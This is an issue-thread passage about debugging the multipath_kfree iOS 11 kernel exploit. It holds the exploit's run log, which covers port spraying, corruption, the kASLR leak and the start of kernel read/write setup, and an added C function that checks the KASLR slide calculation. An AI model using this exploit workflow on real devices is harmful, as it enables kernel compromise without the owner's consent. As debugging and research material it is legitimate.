Comments (3)
Can you provide the panic log from that time? I think your offset may be incorrect.
from multipath_kfree.
██╗  ██╗ ██████╗ ██████╗ ██████╗ ███████╗
╚██╗██╔╝██╔════╝██╔═══██╗██╔══██╗██╔════╝
 ╚███╔╝ ██║     ██║   ██║██║  ██║█████╗
 ██╔██╗ ██║     ██║   ██║██║  ██║██╔══╝
██╔╝ ██╗╚██████╗╚██████╔╝██████╔╝███████╗
╚═╝  ╚═╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝
Hello there debugger, thanks for debugging me, but I might be unreliable with big brother watching me (kernel panics).
Debug server process id: 356 group process id: 357
Stage 1: Exploiting the kernel.
offsets selected for iOS 11.3 or above
build_id: 15E302
sysname: Darwin
nodename: Luoei-5s
release: 17.5.0
version: Darwin Kernel Version 17.5.0: Tue Mar 13 21:32:12 PDT 2018; root:xnu-4570.52.2~8/RELEASE_ARM64_S5L8960X
machine: iPhone6,2
Your device isn't supported yet, find your offsets and add them to offsets.m in the project.
Initializing multipath_kfree bug...
Filling the zone with 10,000 machports...
Filling the zone with another 0x20 machports serving as our first port for corruption...
Creating our first socket...
Our first socket descriptor is: 3
Filling the zone and our first port array with the remaining 68 ports...
Creating the rest of our 15 sockets...
Initializing empty messages for all of our potential first ports...
Freeing first and second in our socket struct and praying that we are still here...
Finding corrupt port in that zone so we can leak the kernel ASLR shift later...
Port 0x26d603 is corrupt!
Corrupt port: 0026D603 31
Filling ports to serve as a zone spray for finding the kASLR slide and getting r/w...
Initializing empty messages for all of our sprayed ports...
Receiving the response message from our corrupt port, leaking the address of our new contained port...
Refill port is at 0xfffffff1136c07a0
Sending an empty message to our corrupted port...
Freeing the contained port using multipath bug...
Port 0x26d603 is corrupt!
Leaking kASLR by filling the zone with userclients to AGXCommandQueue...
Receiving back from our corrupt port, leaking the address of the userclient...
Calculating the address of the vtable of AGXCommandQueue from the leaked userclient...
AGXCommandQueue vtable is at: 0xfffffff00b48d8c0
Calculating kaslr_shift, if this displays 0xffff(something) then check if the vtable offset is correct!
kaslr shift: 0xfffffff00b48d8c0
Destroying the corrupted port as we now have the kASLR slide...
Filling the zone again with some random ports so we can get kernel read write...
Setting up kernel r/w access using s1guza's gadgets...
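The last lines of the log above are the step the tool itself warns about: the slide is the leaked AGXCommandQueue vtable pointer minus the vtable's unslid address from the offsets table, and a "slide" that still starts with 0xffff means that subtraction was done against a wrong offset. In this run the printed slide is identical to the leaked vtable address, which is exactly what a zero (unset) offset produces on a device the offsets table does not cover. The C below is an added example, not multipath_kfree's code: it performs that subtraction with the checks a practitioner would want before trusting the value. The unslid vtable address, the unslid kernel base, the page size and the slide range are constructed assumptions; the real unslid vtable address has to be taken from the kernelcache of the exact build (15E302 here).

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed placeholders (assumptions, not values from any real kernelcache). */
#define KERNEL_BASE_UNSLID  0xfffffff007004000ULL /* assumed unslid arm64 kernel text base */
#define KERNEL_PAGE_SIZE    0x4000ULL             /* 16K pages on arm64 iOS */
#define MAX_PLAUSIBLE_SLIDE 0x100000000ULL        /* assumption: a real slide is far below 4 GiB */

typedef enum {
    SLIDE_OK = 0,
    SLIDE_ERR_NO_OFFSET,       /* offsets table holds 0 for this build (unsupported device) */
    SLIDE_ERR_NOT_KERNEL_PTR,  /* leaked value is not a 0xffffffxx_xxxxxxxx kernel pointer */
    SLIDE_ERR_UNDERFLOW,       /* leaked < unslid: the subtraction would wrap around */
    SLIDE_ERR_LOOKS_LIKE_PTR,  /* result still carries the kernel prefix: offset is wrong */
    SLIDE_ERR_NOT_ALIGNED,     /* result is not page aligned, so it cannot be a slide */
    SLIDE_ERR_TOO_LARGE,       /* result is outside the plausible slide range */
} slide_status_t;

/* arm64 XNU kernel pointers sit in the 0xffffffxx_xxxxxxxx range. */
static int is_kernel_pointer(uint64_t v) {
    return (v >> 40) == 0xffffffULL;
}

/* slide = leaked_vtable - vtable_unslid, accepted only if every sanity check passes.
 * On success the slide is written to *slide_out (may be NULL). */
slide_status_t compute_kaslr_slide(uint64_t leaked_vtable, uint64_t vtable_unslid,
                                   uint64_t *slide_out) {
    if (vtable_unslid == 0)
        return SLIDE_ERR_NO_OFFSET;
    if (!is_kernel_pointer(leaked_vtable))
        return SLIDE_ERR_NOT_KERNEL_PTR;
    if (leaked_vtable < vtable_unslid)
        return SLIDE_ERR_UNDERFLOW;

    uint64_t slide = leaked_vtable - vtable_unslid;

    if (is_kernel_pointer(slide))          /* the 0xffff(something) case from the log */
        return SLIDE_ERR_LOOKS_LIKE_PTR;
    if (slide % KERNEL_PAGE_SIZE != 0)
        return SLIDE_ERR_NOT_ALIGNED;
    if (slide >= MAX_PLAUSIBLE_SLIDE)
        return SLIDE_ERR_TOO_LARGE;

    if (slide_out)
        *slide_out = slide;
    return SLIDE_OK;
}

/* Slid kernel base follows directly once the slide is trusted. */
uint64_t slid_kernel_base(uint64_t slide) {
    return KERNEL_BASE_UNSLID + slide;
}

static const char *slide_status_str(slide_status_t s) {
    switch (s) {
    case SLIDE_OK:                return "ok";
    case SLIDE_ERR_NO_OFFSET:     return "no vtable offset for this build";
    case SLIDE_ERR_NOT_KERNEL_PTR:return "leaked value is not a kernel pointer";
    case SLIDE_ERR_UNDERFLOW:     return "leaked address below unslid address";
    case SLIDE_ERR_LOOKS_LIKE_PTR:return "slide still looks like a pointer, check the vtable offset";
    case SLIDE_ERR_NOT_ALIGNED:   return "slide not page aligned";
    case SLIDE_ERR_TOO_LARGE:     return "slide outside plausible range";
    }
    return "unknown";
}

int main(void) {
    uint64_t slide = 0;

    /* The leaked vtable from the log above, with the zero offset an unsupported
     * device leaves in the table: rejected instead of reported as a slide. */
    slide_status_t st = compute_kaslr_slide(0xfffffff00b48d8c0ULL, 0, &slide);
    printf("log case: %s\n", slide_status_str(st));

    /* Constructed working case: leaked = unslid + 0x4304000. */
    st = compute_kaslr_slide(0xfffffff00b4888c0ULL, 0xfffffff0071848c0ULL, &slide);
    printf("constructed case: %s, slide 0x%llx, kernel base 0x%llx\n",
           slide_status_str(st), (unsigned long long)slide,
           (unsigned long long)slid_kernel_base(slide));
    return 0;
}
```

The ordering of the checks matters: the zero-offset and underflow tests run before the subtraction, so a wrapped value never reaches the alignment test, and the "still looks like a pointer" test is what turns the silent failure in the log (slide == leaked address) into an explicit refusal to continue into the read/write stage.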